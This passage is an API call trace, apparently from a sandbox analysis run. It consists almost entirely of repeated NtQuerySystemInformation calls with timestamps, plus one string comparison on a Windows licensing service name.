(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd400, Length=0x28, ResultLength=0x0) [0271.430] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd480, Length=0x50, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x28, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x28, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.436] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1b0, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x38, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd230, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1c0, Length=0x20, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.448] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb10, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda00, Length=0x50, ResultLength=0x0) [0271.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.467] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd760, Length=0x28, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.469] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7d0, Length=0x28, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd850, Length=0x28, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6f0, Length=0x20, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x20, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x38, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x20, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd740, Length=0x20, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8a0, Length=0x20, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc70, Length=0x50, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb60, Length=0x50, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x28, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x28, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0271.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9b0, Length=0x28, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x38, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x20, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x20, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 